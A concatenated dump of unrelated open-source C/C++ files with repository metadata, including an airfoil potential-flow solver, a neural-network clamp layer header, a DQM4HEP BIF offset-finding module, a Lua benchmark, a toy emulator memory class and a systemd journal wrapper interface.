nos[i][j].velocidade = sqrt(vx*vx+vy*vy);
}
}
}
void calcularCPAerofolio (){
for(int i=ILE;i<=ITE;i++){
double vxi1 = (nos[i+1][1].phi - nos[i-1][1].phi)/(nos[i+1][1].x - nos[i-1][1].x);
double vxi2 = (nos[i+1][2].phi - nos[i-1][2].phi)/(nos[i+1][2].x - nos[i-1][2].x);
double vx = 0.5*(vxi1+vxi2);
double vy = contorno[i].phi;
double velocidade = sqrt(vx*vx+vy*vy);
cpAerofolio[i-ILE]= 1 - (velocidade*velocidade/(Uinf*Uinf));
}
}
void imprimirCpAerofolio(const char* nomeDoArquivo){
FILE* fcpaer = fopen(nomeDoArquivo,"w");
for(int i=0;i<cpAerofolio.size();i++){
fprintf(fcpaer,"%+5.5lf %+5.5lf \n",nos[i+ILE][1].x,-cpAerofolio[i]);
}
fclose(fcpaer);
}
char* prefixarMetodo(const char* palavra,Metodo metodo){
char* temp = (char*) malloc(200*sizeof(char));
switch(metodo){
case Jacobi:
sprintf(temp,"Jacobi%s",palavra);
break;
case GaussSeidel:
sprintf(temp,"GaussSeidel%s",palavra);
break;
case SOR:
sprintf(temp,"SOR%s",palavra);
break;
case LineGaussSeidel:
sprintf(temp,"LineGaussSeidel%s",palavra);
break;
case SLOR:
sprintf(temp,"SLOR%s",palavra);
break;
}
return temp;
}
void solucionar(Metodo metodo){
aplicarCondicoesIniciais();
imprimirPotenciais("potInicial.dat");
count=0;
//while(!iterarMalha(metodo) && count < 10000) count++;
while(count < 10000){
iterarMalha(metodo);
count++;
}
printf("Iteracoes %d\n",count);
calcularVelocidades();
calcularCPAerofolio();
imprimirCpAerofolio(prefixarMetodo("cpAerofolio.dat",metodo));
imprimirResiduo(prefixarMetodo("residuo.dat",metodo));
imprimirPotenciais("potFinal.dat");
imprimirCoeficientesDeVelocidade("velocidade.dat");
imprimirCoeficientesDePressao(prefixarMetodo("pressao.dat",metodo));
}
};
int main(){
double t = 0.1, Uinf = 1.0;
double rsor = 0.1;
finish();
timerStart = Timer::now();
Malha m1 = Malha(11,31,41,12,1.25,1.25, t,Uinf);
m1.setRelaxacaoSor(rsor);
m1.solucionar(Jacobi);
finish();
timerEnd = Timer::now();
cout << "o tempo de execucao 1 foi de " << (timerEnd - timerStart).milliseconds() << " milissegundos.\n";
/*Malha m2 = Malha(11,31,41,12,1.25,1.25, t,Uinf);
m2.setRelaxacaoSor(rsor);
m2.solucionar(SOR);
Malha m3 = Malha(11,31,41,12,1.25,1.25, t,Uinf);
m3.setRelaxacaoSor(rsor);
m3.solucionar(GaussSeidel);
Malha m4 = Malha(11,31,41,12,1.25,1.25, t,Uinf);
m4.setRelaxacaoSor(rsor);
m4.solucionar(LineGaussSeidel);
Malha m5 = Malha(11,31,41,12,1.25,1.25, t,Uinf);
m5.setRelaxacaoSor(rsor);
m5.solucionar(SLOR);*/
}
|
cd29696adc1eb79c7aa009d38117e374331d8e18
|
1901bdbaf57584e7c5ec21643db340f9d98d6807
|
/training/src/compiler/training/base/layers/basic/ClampLayer.h
|
3aa2dd205c74fce650428db2cd7ad2852c3fb303
|
[
"MIT"
] |
permissive
|
huawei-noah/bolt
|
2a4febe5f5cce64e3589c2782c489d59975eb6a3
|
cf4ca8f8646a8e30ddf91c29a18743d75ac1c172
|
refs/heads/master
| 2023-08-28T13:36:34.815244
| 2023-06-12T01:24:41
| 2023-06-12T01:24:41
| 225,365,905
| 889
| 168
|
MIT
| 2023-06-12T01:24:42
| 2019-12-02T12:06:12
|
C++
|
UTF-8
|
C++
| false
| false
| 1,940
|
h
|
ClampLayer.h
|
// Copyright (C) 2022. Huawei Technologies Co., Ltd. All rights reserved.
// Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"),
// to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense,
// and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
// The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
// THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
// WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
// COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
// OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#ifndef CLAMP_LAYER_H
#define CLAMP_LAYER_H
#include <training/base/common/Common.h>
#include <training/base/layers/BasicLayer.h>
#include <training/base/layers/parameters/ClampLayerParams.h>
namespace raul
{
/**
* @brief ClampLayer
* Clamp all elements in input into the range [ min, max ] and return a resulting tensor
*
*/
class ClampLayer : public BasicLayer
{
public:
ClampLayer(const Name& name, const ClampLayerParams& params, NetworkParameters& networkParameters);
ClampLayer(ClampLayer&&) = default;
ClampLayer(const ClampLayer&) = delete;
ClampLayer& operator=(const ClampLayer&) = delete;
private:
raul::dtype mMin;
raul::dtype mMax;
std::vector<raul::dtype> mIsAcceptable;
template<typename MM>
friend class ClampLayerCPU;
};
} // raul namespace
#endif
|
921729cf71c84801c3261ce1cd4ab246b743008a
|
bc4910ecec94749697dbce5e7cf5093275411125
|
/src/generator/config/vgu/v1.1/vg_hooks_symbian.cpp
|
e8eed2450e9cb975d4e79f0df7110ca2a30d3240
|
[
"MIT"
] |
permissive
|
se210/tracy
|
7e73a6f0d64f355842b9a11035c3720b4d40fde5
|
232a42ce1aefcffa1f8544c89d60a16ebd897033
|
refs/heads/master
| 2021-01-09T20:55:03.241111
| 2013-12-15T23:34:36
| 2013-12-15T23:34:36
| null | 0
| 0
| null | null | null | null |
UTF-8
|
C++
| false
| false
| 70
|
cpp
|
vg_hooks_symbian.cpp
|
/*
* Common Symbian hooks for the OpenVG tracer and player
*/
|
d613606b7c8170b3497321903504cb2e18c4ae77
|
6c151ef158af32b80f32d35c7e6abd7b190655bd
|
/source/AHCAL_BIF/BIF/FindOffset/FindOffset.cc
|
7933655026e7768ac3ae41ff260d7ccd5e8b085e
|
[] |
no_license
|
AHCALMonitoring/DQM4ILC
|
a1d42768cfb464e7449fe6a69746d53289487237
|
e3f1e79319f77d27a1db38c69c3c6fffe44103f7
|
refs/heads/master
| 2021-01-24T03:18:25.362733
| 2018-10-12T20:14:55
| 2018-10-12T20:14:55
| 54,559,612
| 0
| 3
| null | 2018-10-12T20:14:56
| 2016-03-23T12:53:57
|
C++
|
UTF-8
|
C++
| false
| false
| 13,864
|
cc
|
FindOffset.cc
|
/// \file FindOffset.cc
/*
*-------------------------------------------------------------
* AHCALRawModule.cc source template automatically modified from
* CaloHitModule generated by a class generator
* by A. Irles, DESY, 23 March 2016
*--------------------------------------------------------------
* This file is part of DQM4HEP libraries.
*
* DQM4HEP is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
* based upon these libraries are permitted. Any copy of these libraries
* must include this copyright notice.
*
* DQM4HEP is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with DQM4HEP. If not, see <http://www.gnu.org/licenses/>.
*
* @author Remi Ete
* @copyright CNRS , IPNL
*/
#include "FindOffset.h"
// to handle and acces to the elements in the LCIO generic Object
// -- std headers
#include <ctime>
#include <cstdlib>
#include <limits>
#include <map>
#include <vector>
//#ifndef USELCIO
//#define USELCIO
#include "EVENT/LCGenericObject.h"
#include "EVENT/LCCollection.h"
#include "EVENT/LCEvent.h"
#include "EVENT/LCIO.h"
#include "UTIL/CellIDDecoder.h"
#include "UTIL/LCTOOLS.h"
//#endif
// -- dqm4hep headers
#include "dqm4hep/DQMMonitorElement.h"
#include "dqm4hep/DQMCoreTool.h"
#include "dqm4hep/DQMRun.h"
#include "dqm4hep/DQMXmlHelper.h"
#include "dqm4hep/DQMEvent.h"
#include "dqm4hep/DQMQualityTest.h"
#include "dqm4hep/DQMModuleApi.h"
#include "dqm4hep/DQMPlugin.h"
// -- root headers
#include "TRandom.h"
#include "TString.h" // Added by Tom for TString handling
//BIF PARAMETERS
#define BIF_START_ACQ 0x03000000
#define BIF_STOP_ACQ 0x02000000
#define BIF_OFFSET 0
#define BIF_BINNING 5120
#define BIF_RESOLUTION 0.78125
//BIF LEMO Connection definition
#define BIF_1ST_LEMO 0x1000000
#define BIF_2ND_LEMO 0x1010000
#define BIF_3RD_LEMO 0x1020000
#define BIF_4TH_LEMO 0x1030000
//using namespace lcio;
namespace dqm4hep
{
// module plugin declaration
DQM_PLUGIN_DECL( FindOffset , "FindOffset" )
//-------------------------------------------------------------------------------------------------
FindOffset::FindOffset() :
DQMAnalysisModule()
{
setDetectorName("NO DETECTOR");
setVersion(1, 0, 0);
}
//-------------------------------------------------------------------------------------------------
FindOffset::~FindOffset()
{
}
//-------------------------------------------------------------------------------------------------
StatusCode FindOffset::readSettings(const TiXmlHandle xmlHandle)
{
LOG4CXX_INFO( dqmMainLogger , "Module : " << getName() << " -- readSettings()" );
//---------------------------------------------------------------------
//plot correlations
m_pCorrelations = NULL;
RETURN_RESULT_IF(STATUS_CODE_SUCCESS, !=, DQMXmlHelper::bookMonitorElement(this, xmlHandle, "Correlations", m_pCorrelations));
//-----------------------------------------------------
m_dumpEvent = false;
RETURN_RESULT_IF_AND_IF(STATUS_CODE_SUCCESS, STATUS_CODE_NOT_FOUND, !=, DQMXmlHelper::readParameterValue(xmlHandle,
"DumpEvent", m_dumpEvent));
for(int i=0; i< 10000; i++) {
correlated_entries[i]=0;
if(i>0 ) m_bifoffset[i]=m_bifoffset[i-1]+10;
else m_bifoffset[i]=10;
}
return STATUS_CODE_SUCCESS;
}
//-------------------------------------------------------------------------------------------------
StatusCode FindOffset::initModule()
{
LOG4CXX_INFO( dqmMainLogger , "Module : " << getName() << " -- init()" );
// print directory structure of monitor element storage in console
DQMModuleApi::cd(this);
DQMModuleApi::ls(this, true);
return STATUS_CODE_SUCCESS;
}
//-------------------------------------------------------------------------------------------------
StatusCode FindOffset::endModule()
{
LOG4CXX_INFO( dqmMainLogger , "Module : " << getName() << " -- end()" );
return STATUS_CODE_SUCCESS;
}
//-------------------------------------------------------------------------------------------------
StatusCode FindOffset::processEvent(DQMEvent *pEvent)
{
for(int i=0; i<10000; i++) {
int EventCntIndex = 1;
int BxIDIndex = 1;
int EvtNrIndex = 2;
int ChipIDIndex = 3;
int NChannelsIndex = 4;
int TDCFirstChannelIndex = 5;
int ADCFirstChannelIndex = TDCFirstChannelIndex+36;
EVENT::LCEvent *pLCEvent = pEvent->getEvent<EVENT::LCEvent>();
if(!pLCEvent)
return STATUS_CODE_FAILURE;
if(m_dumpEvent)
UTIL::LCTOOLS::dumpEvent(pLCEvent);
const std::vector<std::string> *pCollectionNames = pLCEvent->getCollectionNames();
//map to make the bxid sorting per readout cycle of the ahcal raw data
std::map< int, std::vector< std::vector<int> > > rData;
// the bif data is already sorted
std::vector<int> rBIF;
std::vector< std::vector<int> > new_rBIF;
unsigned long long int TimeStamp_start = 0;//BIF Start Timestamp
unsigned long long int TimeStamp_stop = 0;//BIF Stop Timestamp
for(std::vector<std::string>::const_iterator colIter = pCollectionNames->begin();
colIter != pCollectionNames->end() ; ++colIter)
{
const std::string &collectionName(*colIter);
EVENT::LCCollection *pLCCollection = pLCEvent->getCollection(collectionName);
// --------------------------------------------------------------------
if(collectionName=="EUDAQDataBIF")
{
if(pLCCollection->getTypeName() == EVENT::LCIO::LCGENERICOBJECT)
{
const EVENT::LCGenericObject *const pBIFRaw =
dynamic_cast<const EVENT::LCGenericObject *const>(pLCCollection->getElementAt(0));
if(NULL == pBIFRaw)
continue;
//Check Start and Stop
unsigned int start_acq = (unsigned int)pBIFRaw->getIntVal(0);
unsigned int stop_acq = (unsigned int)pBIFRaw->getIntVal(pBIFRaw->getNInt() - 4);
if( ((start_acq)&0xFF000000) != BIF_START_ACQ )
{
LOG4CXX_INFO( dqmMainLogger , "Problem with the start acquisition of the BIF "<<pBIFRaw->getIntVal(1)<<" " );
continue;
}
if( ((stop_acq)&0xFF000000) != BIF_STOP_ACQ )
{
LOG4CXX_INFO( dqmMainLogger , "Problem with the stop acquisition of the BIF, skip cycle "<<pBIFRaw->getIntVal(1)<<" " );
continue;
}
//Get Timestamp start
unsigned int start_TS_low = (unsigned int)pBIFRaw->getIntVal(2);
unsigned int start_TS_high = (unsigned int)pBIFRaw->getIntVal(3);
TimeStamp_start = ( (unsigned long long int)start_TS_high<<32 | start_TS_low );
//Get Timestamp stop
unsigned int stop_TS_low = (unsigned int)pBIFRaw->getIntVal(pBIFRaw->getNInt() - 2);
unsigned int stop_TS_high = (unsigned int)pBIFRaw->getIntVal(pBIFRaw->getNInt() - 1);
TimeStamp_stop = ( (unsigned long long int)stop_TS_high<<32 | stop_TS_low );
// std::cout << " BIF Block - Start Time : " << TimeStamp_start << std::endl
// << " - Stop Time : " << TimeStamp_stop << std::endl
// << " Acq time : " << TimeStamp_stop - TimeStamp_start << std::endl;
for(int i = 4; i < pBIFRaw->getNInt() - 4; i++)
{
rBIF.push_back(pBIFRaw->getIntVal(i));
}
//Divide original vector in N vector corresponding to N triggers of the BIF each of a size of 4
unsigned int nTrigger = (int)rBIF.size()/4;
// std::cout << "Number of BIF Trigger in the ROC " << pBIFRaw->getIntVal(1)
// << " : " << nTrigger << std::endl;
new_rBIF.resize(nTrigger);
for(unsigned int i = 0; i < nTrigger; i++)
{
new_rBIF[i].resize(4);
for(unsigned int ii = 0; ii < 4; ii++)
{
new_rBIF[i][ii] = rBIF.at(4*i + ii);
}
}
rBIF.clear();
}
}
// --------------------------------------------------------------------
if(collectionName=="EUDAQDataScCAL")
{
if(pLCCollection->getTypeName() == EVENT::LCIO::LCGENERICOBJECT)
{
const int nElements = pLCCollection->getNumberOfElements();
for(int e=0 ; e<nElements ; e++)
{
const EVENT::LCGenericObject *const pAHCALRaw =
dynamic_cast<const EVENT::LCGenericObject *const>(pLCCollection->getElementAt(e));
if(NULL == pAHCALRaw)
continue;
const int nChannels = pAHCALRaw->getIntVal(NChannelsIndex);
if(nChannels!= 36) {
LOG4CXX_INFO( dqmMainLogger , "Wrong number of channels ("<<nChannels<<"), skip event" );
continue;
}
//fill the map with all entries
int bxid = pAHCALRaw->getIntVal(BxIDIndex);
std::vector<int> rawdata;
for(int iraw=0; iraw < pAHCALRaw->getNInt(); iraw++) rawdata.push_back(pAHCALRaw->getIntVal(iraw));
rData[bxid].push_back(rawdata);
rawdata.clear();
}//for elements
}// if LCGENERICOBJECT
}//if collectionName == EUDAQDataScCAL
//bxid sorting
for(std::map< int, std::vector< std::vector<int> > >::iterator it=rData.begin(); it!=rData.end();++it)
{
// std::cout<<it->first<<" "<< it->second.size() <<std::endl;
// std::cout<<new_rBIF.size() <<std::endl;
//Create new BIF Blocks
for(unsigned int ibif = 0; ibif < new_rBIF.size(); ibif++)
{
int source = -1;
unsigned int TriggerSource = (unsigned int)new_rBIF[ibif].at(0);
if( ((TriggerSource)&0xFFF0000) == BIF_1ST_LEMO )
source = 0;
if( ((TriggerSource)&0xFFF0000) == BIF_2ND_LEMO )
source = 1;
if( ((TriggerSource)&0xFFF0000) == BIF_3RD_LEMO )
source = 2;
if( ((TriggerSource)&0xFFF0000) == BIF_4TH_LEMO )
source = 3;
unsigned int TS_low = (unsigned int)new_rBIF[ibif].at(2);
unsigned int TS_high = (unsigned int)new_rBIF[ibif].at(3);
unsigned long long int TimeStamp = ( (unsigned long long int)TS_high<<32 | TS_low );
// int m_bifoffset = 73170;
//Relative time to start acquisition
unsigned long long int RelativeTime = TimeStamp - TimeStamp_start;
//BXID of the Trigger
int BXID_BIF = (int)(RelativeTime - m_bifoffset[i])/BIF_BINNING;
//Time of the Trigger
float Time_BIF = (float)((RelativeTime - m_bifoffset[i])%BIF_BINNING * BIF_RESOLUTION);
for (unsigned int iraw = 0; iraw < it->second.size(); iraw++ )
{
for(int f=0 ; f<36 ; f++) //
{
int tdcRAW = it->second.at(iraw)[TDCFirstChannelIndex+f];
int adcRAW = it->second.at(iraw)[ADCFirstChannelIndex+f];
int tdc = tdcRAW%4096;
int adc = adcRAW%4096;
int hitbit_adc = (adcRAW & 0x1000)?1:0;
int gainbit_adc = (adcRAW & 0x2000)?1:0;
int hitbit_tdc = (tdcRAW & 0x1000)?1:0;
int gainbit_tdc = (tdcRAW & 0x2000)?1:0;
if(it->first == BXID_BIF && hitbit_adc==hitbit_tdc && gainbit_adc==gainbit_tdc && hitbit_adc==1 && adc > 0) {
correlated_entries[i]++;
}
}
}
}//if new_rBIF size
} // end iterating over map elements
}// iterator
rData.clear();
new_rBIF.clear();
}
return STATUS_CODE_SUCCESS;
}
//-------------------------------------------------------------------------------------------------
StatusCode FindOffset::startOfCycle()
{
LOG4CXX_INFO( dqmMainLogger , "Module : " << getName() << " -- startOfCycle()" );
return STATUS_CODE_SUCCESS;
}
//-------------------------------------------------------------------------------------------------
StatusCode FindOffset::endOfCycle()
{
LOG4CXX_INFO( dqmMainLogger , "Module : " << getName() << " -- endOfCycle()" );
// run all quality tests on all monitor elements
RETURN_RESULT_IF(STATUS_CODE_SUCCESS, !=, DQMModuleApi::runQualityTests(this));
return STATUS_CODE_SUCCESS;
}
//-------------------------------------------------------------------------------------------------
StatusCode FindOffset::startOfRun(DQMRun *pRun)
{
LOG4CXX_INFO( dqmMainLogger , "Module : " << getName() << " -- startOfRun()" );
LOG4CXX_INFO( dqmMainLogger , "Run no " << pRun->getRunNumber() );
// time_t startTime = pRun->getStartTime();
time_t startTime = std::chrono::system_clock::to_time_t(pRun->getStartTime());
std::string timeStr;
DQMCoreTool::timeToHMS(startTime, timeStr);
LOG4CXX_INFO( dqmMainLogger , "Start time " << timeStr );
LOG4CXX_INFO( dqmMainLogger , "Detector is " << pRun->getDetectorName() );
LOG4CXX_INFO( dqmMainLogger , "Description " << pRun->getDescription() );
return STATUS_CODE_SUCCESS;
}
//-------------------------------------------------------------------------------------------------
StatusCode FindOffset::endOfRun(DQMRun *pRun)
{
LOG4CXX_INFO( dqmMainLogger , "Module : " << getName() << " -- endOfRun()" );
LOG4CXX_INFO( dqmMainLogger , "Run no " << pRun->getRunNumber() );
// time_t endTime = pRun->getEndTime();
time_t endTime = std::chrono::system_clock::to_time_t(pRun->getEndTime());
std::string timeStr;
DQMCoreTool::timeToHMS(endTime, timeStr);
LOG4CXX_INFO( dqmMainLogger , "End time " << timeStr );
for(int i=0; i<10000; i++) {
// std::cout<<"BIF ratio of good correlations: "<<correlated_entries[i]<<" , biff_offset:"<<m_bifoffset[i]<<std::endl;
Int_t pointID = m_pCorrelations->get<TGraph>()->GetN();
m_pCorrelations->get<TGraph>()->SetPoint(pointID,m_bifoffset[i] , correlated_entries[i] );
}
return STATUS_CODE_SUCCESS;
}
};
|
2c29a3e0742b87a3c86787ce2c8b082c5087d1c0
|
8f1acbd9344700e2c041503f0938cd14a8d48ab8
|
/Luac/benchmark/main.cpp
|
5f604086f1d646388158ab3370960ff03404a448
|
[] |
no_license
|
KORYUOH/Luac
|
13a89294a3550e4db70f3c73838fb5e7b2ca59da
|
ae5288a033eb542f7f56b3ab7e8e3189503d3494
|
refs/heads/master
| 2018-12-29T21:07:15.805226
| 2015-04-04T08:04:25
| 2015-04-04T08:04:25
| 33,398,532
| 2
| 1
| null | null | null | null |
UTF-8
|
C++
| false
| false
| 738
|
cpp
|
main.cpp
|
#include <Lua/Luac.h>
#include <Luabin/Luabin.h>
#include <ClockTimer/ClockTimer.h>
#include <iostream>
#include <memory>
#include <cstdlib>
#ifdef _DEBUG
#pragma comment(linker,"/NODEFAULTLIB:libcmt.lib")
#endif
int main(int argc,char* argv[]){
std::unique_ptr<ClockTimer> timer(new ClockTimer());
Luabin binary("tarai.lua");
binary.convert();
Luac lua("tarai.lua");
Luac lub("tarai.lub");
std::cout<< "LUA START \n";
timer->start();
//*
lua.run();
/*/
lua.Dump();
//*/
timer->stop();
std::cout <<"LUA >> "<< timer->getTimerSec() << "\n";
std::cout<<"LUB START\n";
timer->start();
//*
lua.run();
/*/
lua.Dump();
//*/
timer->stop();
std::cout <<"LUB >> "<< timer->getTimerSec() << "\n";
system("pause");
return 0;
}
|
9dec09e0de60ab9e96d00a65a83248988d38c508
|
785df77400157c058a934069298568e47950e40b
|
/TnbSectPx/TnbLib/SectPx/FieldFun/nonParameter/readY/SectPx_FieldFun_readY.cxx
|
7970ce22dd1a65f2d57f2de711993d17551fa444
|
[] |
no_license
|
amir5200fx/Tonb
|
cb108de09bf59c5c7e139435e0be008a888d99d5
|
ed679923dc4b2e69b12ffe621fc5a6c8e3652465
|
refs/heads/master
| 2023-08-31T08:59:00.366903
| 2023-08-31T07:42:24
| 2023-08-31T07:42:24
| 230,028,961
| 9
| 3
| null | 2023-07-20T16:53:31
| 2019-12-25T02:29:32
|
C++
|
UTF-8
|
C++
| false
| false
| 974
|
cxx
|
SectPx_FieldFun_readY.cxx
|
#include <SectPx_FieldFun_readY.hxx>
#include <SectPx_Coord.hxx>
#include <TnbError.hxx>
#include <OSstream.hxx>
const char* tnbLib::sectPxLib::FieldFun_readY::typeName_ = "fieldFun_readY";
tnbLib::sectPxLib::FieldFun_readY::FieldFun_readY
(
const std::shared_ptr<SectPx_Coord>& theCoord
)
: theCoord_(theCoord)
{
}
tnbLib::sectPxLib::FieldFun_readY::FieldFun_readY
(
const Standard_Integer theIndex,
const std::shared_ptr<SectPx_Coord>& theCoord
)
: SectPx_nonParFieldFun(theIndex)
, theCoord_(theCoord)
{
}
tnbLib::sectPxLib::FieldFun_readY::FieldFun_readY
(
const Standard_Integer theIndex,
const word & theName,
const std::shared_ptr<SectPx_Coord>& theCoord
)
: SectPx_nonParFieldFun(theIndex, theName)
, theCoord_(theCoord)
{
}
tnbLib::word
tnbLib::sectPxLib::FieldFun_readY::RegObjTypeName() const
{
return typeName_;
}
Standard_Real
tnbLib::sectPxLib::FieldFun_readY::Value() const
{
Debug_Null_Pointer(theCoord_);
return theCoord_->yCoord();
}
|
911bd39a8b6b54ea237ac8b604cf088e4f0d9631
|
83d0499301fd280c9f9ff47d5f6ad6779ada5557
|
/Module03/ex04/SuperTrap.hpp
|
80b154bb3b15383ead84788a2f0060bbe28ea47d
|
[] |
no_license
|
Croco-byte/PiscineCPP
|
5d9a7ce8229eb4c24331a817549bbdc6678d7440
|
85752bf624d5a89784f61fbe1a317e35956ec545
|
refs/heads/master
| 2023-04-15T05:31:46.674909
| 2021-04-23T12:13:14
| 2021-04-23T12:13:14
| 355,561,800
| 0
| 0
| null | null | null | null |
UTF-8
|
C++
| false
| false
| 1,330
|
hpp
|
SuperTrap.hpp
|
/* ************************************************************************** */
/* */
/* ::: :::::::: */
/* SuperTrap.hpp :+: :+: :+: */
/* +:+ +:+ +:+ */
/* By: user42 <user42@student.42.fr> +#+ +:+ +#+ */
/* +#+#+#+#+#+ +#+ */
/* Created: 2021/04/09 16:21:44 by user42 #+# #+# */
/* Updated: 2021/04/10 11:34:54 by user42 ### ########.fr */
/* */
/* ************************************************************************** */
#ifndef SUPERTRAP_HPP
# define SUPERTRAP_HPP
#include "ClapTrap.hpp"
#include "FragTrap.hpp"
#include "NinjaTrap.hpp"
class SuperTrap: public FragTrap, public NinjaTrap
{
public:
SuperTrap(std::string name);
SuperTrap(SuperTrap const & src);
~SuperTrap();
SuperTrap & operator=(SuperTrap const & rhs);
void meleeAttack(std::string const & target);
void rangedAttack(std::string const & target);
private:
};
#endif
|
a2e3d12b2667da2f25abf2429447b211b94ec5dc
|
dea9fad61c6de96c1db48981c7800437f917858e
|
/interp/memory.h
|
c3f6ac13fefed36ba6ac91c68faf13492af9e61d
|
[] |
no_license
|
Hypersonic/CyberTronix64k
|
c6c10510743fe5eb05ed7fb2af6584ebedeabf01
|
f294fe9617fb8e420a09a04ace65961e3657f53a
|
refs/heads/master
| 2021-05-01T18:31:29.931502
| 2017-03-04T18:20:24
| 2017-03-04T18:20:27
| 70,862,715
| 12
| 1
| null | null | null | null |
UTF-8
|
C++
| false
| false
| 789
|
h
|
memory.h
|
#pragma once
#include <cstdio>
#include <atomic>
typedef uint16_t mem_t;
#define PUTC_LOC 0x200
#define GETC_LOC 0x201
class memory {
public:
memory() : mem{0} {};
// access methods
mem_t& operator[](size_t idx) {
if (idx == PUTC_LOC) {
must_print = true;
return mem[idx];
}
if (idx == GETC_LOC) {
mem[idx] = mem_t(getchar());
return mem[idx];
}
return mem[idx];
}
void flush_changes() {
if (must_print) {
putchar(char(mem[PUTC_LOC]));
must_print = false;
}
}
bool must_print;
mem_t mem[1<<16] = {0}; // lookups that don't hit mmapped regions hit this
};
|
488e576d07ac4bc30a0286a6617e9f70d97c7d9e
|
4bd06834c624ea3c5ec061cb3f95bfbba89b7f07
|
/src/BSTree.h
|
a4e7c9983c55151fd562516bb8a0f56befdb3240
|
[] |
no_license
|
phatv/Banking
|
eb1580a508f6478c89cb80b11648aed4b1d7a4b8
|
e6ede3e1c67ddd36809aa55012bd68f0c9b7cfad
|
refs/heads/master
| 2021-01-10T05:36:33.928478
| 2016-01-15T23:17:58
| 2016-01-15T23:17:58
| 49,750,225
| 0
| 0
| null | null | null | null |
UTF-8
|
C++
| false
| false
| 632
|
h
|
BSTree.h
|
#pragma once
#include "Account.h"
class BSTree
{
public:
BSTree();
~BSTree();
bool Insert(Account *);
// retrieve object, first parameter is the ID of the account
// second parameter holds pointer to found object, NULL if not found
bool Retrieve(const int &, Account * &) const;
// displays the contents of a tree to cout
void Display() const;
void Empty();
bool isEmpty() const;
private:
struct Node
{
Account *pAcct;
Node *right;
Node *left;
};
Node *root;
bool Insert(Node * &, Account *);
bool Retrieve(Node * &, const int &, Account * &) const;
void Display(Node * &) const;
void Empty(Node * &);
};
|
bf0d0b1cc7844f070fdc4b9da8289587f1d64b8b
|
e3b67db8b0ea9af2ba890dc4e119ff22876a2232
|
/extensions/systemd/libwrapper/LibWrapper.h
|
d7e7b7c26711f919255a44513a137f587e4a01b6
|
[
"MPL-2.0",
"Apache-2.0",
"BSD-3-Clause",
"curl",
"OpenSSL",
"libtiff",
"bzip2-1.0.6",
"MIT",
"LicenseRef-scancode-public-domain-disclaimer",
"MIT-0",
"Beerware",
"Zlib",
"NCSA",
"ISC",
"CC0-1.0",
"LicenseRef-scancode-object-form-exception-to-mit",
"BSL-1.0",
"LicenseRef-scancode-public-domain",
"BSD-2-Clause",
"LGPL-2.1-only",
"LicenseRef-scancode-other-permissive",
"LicenseRef-scancode-protobuf",
"Libpng",
"LicenseRef-scancode-mit-old-style",
"JSON",
"BSD-1-Clause",
"LicenseRef-scancode-unknown-license-reference",
"Unlicense",
"LicenseRef-scancode-bsd-unchanged"
] |
permissive
|
apache/nifi-minifi-cpp
|
90919e880bf7ac1ce51b8ad0f173cc4e3aded7fe
|
9b55dc0c0f17a190f3e9ade87070a28faf542c25
|
refs/heads/main
| 2023-08-29T22:29:02.420503
| 2023-08-25T17:21:53
| 2023-08-25T17:21:53
| 56,750,161
| 131
| 114
|
Apache-2.0
| 2023-09-14T05:53:30
| 2016-04-21T07:00:06
|
C++
|
UTF-8
|
C++
| false
| false
| 1,802
|
h
|
LibWrapper.h
|
/**
*
* Licensed to the Apache Software Foundation (ASF) under one or more
* contributor license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright ownership.
* The ASF licenses this file to You under the Apache License, Version 2.0
* (the "License"); you may not use this file except in compliance with
* the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
#pragma once
#include <memory>
#include "../Common.h"
#include "utils/gsl.h"
namespace org { namespace apache { namespace nifi { namespace minifi { namespace extensions { namespace systemd { namespace libwrapper {
struct Journal {
virtual int seekHead() noexcept = 0;
virtual int seekTail() noexcept = 0;
virtual int seekCursor(const char*) noexcept = 0;
virtual int getCursor(gsl::owner<char*>* cursor_out) noexcept = 0;
virtual int next() noexcept = 0;
virtual int enumerateData(const void** data_out, size_t* size_out) noexcept = 0;
virtual int getRealtimeUsec(uint64_t* usec_out) noexcept = 0;
virtual ~Journal() = default;
};
struct LibWrapper {
virtual std::unique_ptr<Journal> openJournal(JournalType) = 0;
virtual ~LibWrapper() = default;
};
std::unique_ptr<LibWrapper> createLibWrapper();
} // namespace libwrapper
} // namespace systemd
} // namespace extensions
} // namespace minifi
} // namespace nifi
} // namespace apache
} // namespace org
|
1d2628ade49a8554d9ccc85064808240ca705f0f
|
08b72b29c59e2c11a03d4f7d3f698d1adb5b7e13
|
/GeometryEngine/Shared/Rectangle.cpp
|
8ac55c334976ca201ebda3f9bdb722f0fe2f2cd9
|
[] |
no_license
|
DavidAHazra/A-Level-CS-Project
|
762bb13f44e111dd85f7b900cd23a8c3430e7660
|
d030fe09988103df53717d943d15b73b5cb84af5
|
refs/heads/master
| 2020-03-12T10:39:24.991974
| 2018-04-22T15:26:54
| 2018-04-22T15:26:54
| 130,578,165
| 1
| 0
| null | null | null | null |
UTF-8
|
C++
| false
| false
| 2,434
|
cpp
|
Rectangle.cpp
|
#include "Rectangle.hpp"
#include "ResourceHandler.hpp"
